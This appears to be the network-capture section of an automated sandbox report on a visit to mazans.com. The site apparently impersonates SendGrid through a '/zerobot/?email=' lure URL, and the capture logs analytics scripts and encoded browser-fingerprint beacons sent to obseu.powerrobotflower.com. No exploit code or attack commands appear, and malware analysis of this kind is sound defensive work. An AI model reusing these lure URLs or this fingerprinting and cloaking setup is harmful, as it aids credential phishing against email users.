                                                                                                                                                                                                                                                                                                                                                                          ETag: "3867b2388b619ff7fddc29ef359fc9aa"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: u16VcQlfwBtHRZyWZ3J5lA.kF3ts0Fc8
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 7ff386cc5735ee5d428e6d9e2fdc8b2c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: mJyHO4l2IPkSFg-xiqFqZCWrTqlD2Ace-P91dZ5Fl1v4LTQahkJ08Q==
                                                                                                                                                                                                                                                                                                                                                                          Age: 4979769
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1559INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 39 33 5d 2c 7b 39 32 35 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 65 29 7b 76 61 72 20 74 2c 69 3b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 65 6e 61 62 6c 65 64 29 3f 65 2e 65 6e 61 62 6c 65 64 3a 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[493],{9254:function(n,e,t){function i(n,e){var t,i;return"boolean"==typeof(null==e?void 0:e.enabled)?e.enabled:null===(i=null===(t=null==n?void 0:n


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          80192.168.2.1749899150.171.28.104436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC355OUTGET /p/action/5202129.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private,max-age=60
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4092
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: 156D352CC12F402091C79A16EDFBD5F3 Ref B: DFW30EDGE0107 Ref C: 2024-11-13T16:29:16Z
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC1865INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 63 2c 6b 2c 61 2c 62 2c 74 2c 65 29 20 7b 0a 20 20 20 20 76 61 72 20 63 73 20 3d 20 64 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 0a 20 20 20 20 69 66 20 28 63 73 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 75 6f 20 3d 20 63 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 75 65 74 6f 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 75 6f 20 26 26 20 77 5b 75 6f 5d 20 26 26 20 74 79 70 65 6f 66 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 5b 75 6f 5d 2e 73 65 74 55 73 65 72 53 69 67 6e 61 6c 73 28 7b 27 65 61 27 3a 20 63 2c 20 27 6b 63 27 3a 20 6b 2c 20 27 61 74 27 3a 20 61 2c 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: (function(w,d,c,k,a,b,t,e) { var cs = d.currentScript; if (cs) { var uo = cs.getAttribute('data-ueto'); if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') { w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, '
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC1948INData Raw: 0a 20 20 20 20 20 20 20 20 69 66 20 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 73 73 69 6f 6e 49 64 20 3d 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 73 65 73 73 69 6f 6e 49 64 4b 65 79 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 65 76 65 6e 74 4f 72 69 67 69 6e 20 3d 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 72 69 67 69 6e 4b 65 79 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 73 65 73 73 69 6f 6e 49 64 20 26 26 20 65 76 65 6e 74 4f 72 69 67 69 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 6f 70 65 6e 65 72 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 7b 74 79 70 65 3a 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: if (sessionStorage) { var sessionId = sessionStorage.getItem(sessionIdKey); var eventOrigin = sessionStorage.getItem(originKey); if (sessionId && eventOrigin) { w.opener.postMessage({type: '
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC279INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 73 74 2c 66 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 63 70 2c 66 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 6d 65 73 73 61 67 65 27 2c 20 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 6c 61 75 6e 63 68 45 76 65 6e 74 53 65 74 75 70 28 29 3b 0d 0a 7d 29 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: } f.parentNode.insertBefore(est,f); }; f.parentNode.insertBefore(cp,f); w.removeEventListener('message', eventListener); }); } launchEventSetup();})(window, document,


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          81192.168.2.174990113.225.78.534436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC361OUTGET /asset/twilio2.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC524INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 15993
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 24 May 2018 00:46:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: public
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 15:30:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 06d36e78e8dfd9468327f09115761a9e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: L2jL7iIWwJ9yw7VQXBCjAnsq3zEyXC3QMV_ONoWOvNsSh1DTCXngDw==
                                                                                                                                                                                                                                                                                                                                                                          Age: 3516
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC15993INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 21 08 02 00 00 00 d1 41 37 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 e1 02 1c 00 16 10 70 ec 7c 73 00 00 20 00 49 44 41 54 68 05 01 01 3e fe c1 01 ed ed ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR!A7pHYstIMEp|s IDATh>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          82192.168.2.174990013.225.78.534436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC536OUTGET /bannermsg?action=views&domain=sendgrid.com&behavior=implied&country=us&language=en&rand=0.21308546817366736&session=57cd44ce-3945-49f8-b363-1f9e5ecbe175&userType=NEW&referer=https://mazans.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 43
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 96c1c36adc76f99239fd3220e5be7e6a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: oV069-oOIsXFhHF0zE3zMIC0LGgRCTJwpRycpYEqbHVHDXJamkwAFg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 2
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          83192.168.2.174990413.107.246.454436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC523OUTGET /tag/uet/5202129 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.clarity.ms
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 878
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: CLID=578bbac004b6466f83ade27540643b49.20241113.20251113; expires=Thu, 13 Nov 2025 16:29:17 GMT; path=/; secure; samesite=none; httponly
                                                                                                                                                                                                                                                                                                                                                                          Request-Context: appId=cid-v1:2f7711a9-b21e-4abe-a9d6-5b0ce5d18b64
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241113T162917Z-16547b76f7fdf69shC1DFWcpd00000000hd00000000008gp
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC878INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 61 2c 72 2c 69 2c 74 2c 79 29 7b 61 5b 63 5d 3d 61 5b 63 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 61 5b 63 5d 2e 71 3d 61 5b 63 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 79 6e 63 28 29 7b 28 6e 65 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 2e 63 6c 61 72 69 74 79 2e 6d 73 2f 63 2e 67 69 66 22 7d 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 73 79 6e 63 28 29 3a 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 73 79 6e 63 29 3b 61 5b 63 5d 28 22 6d 65 74 61 64 61 74 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5b 63 5d 28 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: !function(c,l,a,r,i,t,y){a[c]=a[c]||function(){(a[c].q=a[c].q||[]).push(arguments)};function sync(){(new Image).src="https://c.clarity.ms/c.gif"}"complete"==document.readyState?sync():window.addEventListener("load",sync);a[c]("metadata",(function(){a[c]("


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          84192.168.2.174989754.75.69.1924436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC669OUTPOST /mon HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4419
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC4419OUTData Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 66 63 32 33 34 65 66 34 34 38 66 39 38 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 33 38 34 36 62 32 30 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 38 38 35 38 35 38 65 30 35 32 61 33 61 31 65 61 64 32 62 37 36 30 64 64 34 36 65 64 64 36 33 63 36 30 36 33 34 30 36 32 61 39 36 35 61 35 33 35 63 33 32 30 34 35 62 63 30 62 63 36 62 34 66 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 32 33 63 66 33 34 63 36 64 61 39 30 39 33 33 37 38 31 34 64 61 34 64 65 34 34 34 65 63 38 62 63 35 39 61 37 65 65 34 36
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: e=37dfbd8ee84e001269efc234ef448f989225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d5913846b2017071a10acf9f29f671885858e052a3a1ead2b760dd46edd63c60634062a965a535c32045bc0bc6b4f77be26bb25cb43e2923cf34c6da909337814da4de444ec8bc59a7ee46
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          85192.168.2.17499023.248.162.964436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC7666OUTGET /ct?id=72967&url=https%3A%2F%2Fmazans.com%2FWEB-ID-6672849687924%2Fzerobot%2F%3Femail%3DEMAIL_REDACTED&sf=0&tpi=&ch=SendGrid&uvid=&tsf=0&tsfmi=&tsfu=&cb=1731515352667&hl=1&op=0&ag=300509663&rand=53607585128791107956101156266160898169065292290902265118522000152187107289761818102920&fs=1280x907&fst=1280x907&np=win32&nv=google%20inc.&ref=https%3A%2F%2Fsepedatua.com%2F&ss=1280x1024&nc=0&at=&di=W1siZWYiLDM4ODhdLFsiYWJuY2giLDE3XSxbLTI0LCJbXSJdLFstMjgsImVuLVVTLGVuIl0sWy0zNCwiLSJdLFstNDYsIjAiXSxbLTQ4LCIwLDAiXSxbMTIsIntcImN0eFwiOlwid2ViZ2xcIixcInZcIjpcImdvb2dsZSBpbmMuIChnb29nbGUpXCIsXCJyXCI6XCJhbmdsZSAoZ29vZ2xlLCB2dWxrYW4gMS4zLjAgKHN3aWZ0c2hhZGVyIGRldmljZSAoc3ViemVybykgKDB4MDAwMGMwZGUpKSwgc3dpZnRzaGFkZXIgZHJpdmVyKVwiLFwic2x2XCI6XCJ3ZWJnbCBnbHNsIGVzIDEuMCAob3BlbmdsIGVzIGdsc2wgZXMgMS4wIGNocm9taXVtKVwiLFwiZ3ZlclwiOlwid2ViZ2wgMS4wIChvcGVuZ2wgZXMgMi4wIGNocm9taXVtKVwiLFwiZ3ZlblwiOlwid2Via2l0XCIsXCJiZW5cIjo3LFwid2dsXCI6MSxcImdyZW5cIjpcIndlYmtpdCB3ZWJnbFwiLFwic2VmXCI6MzY5ODUxODcxMCxcInNlY1wiOlwiXCJ9Il0sWy00LCItIl0sWy0zNSw [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                          Host: obseu.powerrobotflower.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: cg_uuid=a7672655cc19ce211243958c37046200
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:17 UTC276INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:17 GMT
                                                                                                                                                                                                                                                                                                                                                                          Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: undefined
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
